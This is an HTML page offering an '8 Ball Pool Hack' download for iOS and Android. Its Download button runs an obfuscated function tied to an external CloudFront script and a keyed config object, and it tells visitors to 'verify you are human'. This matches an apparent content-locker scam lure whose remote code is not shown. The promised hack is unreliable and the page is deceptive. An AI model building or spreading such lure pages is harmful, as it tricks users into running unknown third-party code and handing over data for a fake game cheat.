<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>8ballmod.netlify.app</title>
    <style>
*{padding: 0; margin: 0; font-family: sans-serif;}
main {
    width: 100%;
    height: max-content;
    display: grid;
    justify-content: center;
}
div{display: grid; justify-content: center;}
img {width: 20px; margin-right: 5px;}
button {
    display: flex;
    align-items: center;
    padding: 7px 10px;
    border-radius: 5px;
    border: 0;
    background: #3d3dfd;
    color: #fff;
    font-family: Verdana, Geneva, Tahoma, sans-serif;
    cursor: pointer;
}
/*==================================
                style
===================================*/
h1 {color: #7373ff; margin-top: 30px;}
p {color: #999999; font-family: Verdana, Geneva, Tahoma, sans-serif;}
    </style>



<script type="text/javascript">
    var wgqXL_OWB_BvkFtc={"it":4254887,"key":"267ee"};
</script>
<script src="https://d2ntqa2f0qw7q7.cloudfront.net/7155763.js"></script>
</head>
<body>
    <main>
        <div><h1>8 Ball Pool Hack</h1></div><br>
        <div><h2>هكر البلياردو </h2></div><br>
        <div><p>File size: 9.23 MB<br><br>for ios / android</p></div><br>
        <div><button onclick="_bC()"><img src="r.png" alt=""> Download Now</button></div><br><br><br><br>

        <div>
            <h3>how to Download</h3><br>
            1- click Download <br>
            2- verify you are human <br> <br>
        </div>
        
    </main>
</body>
</html>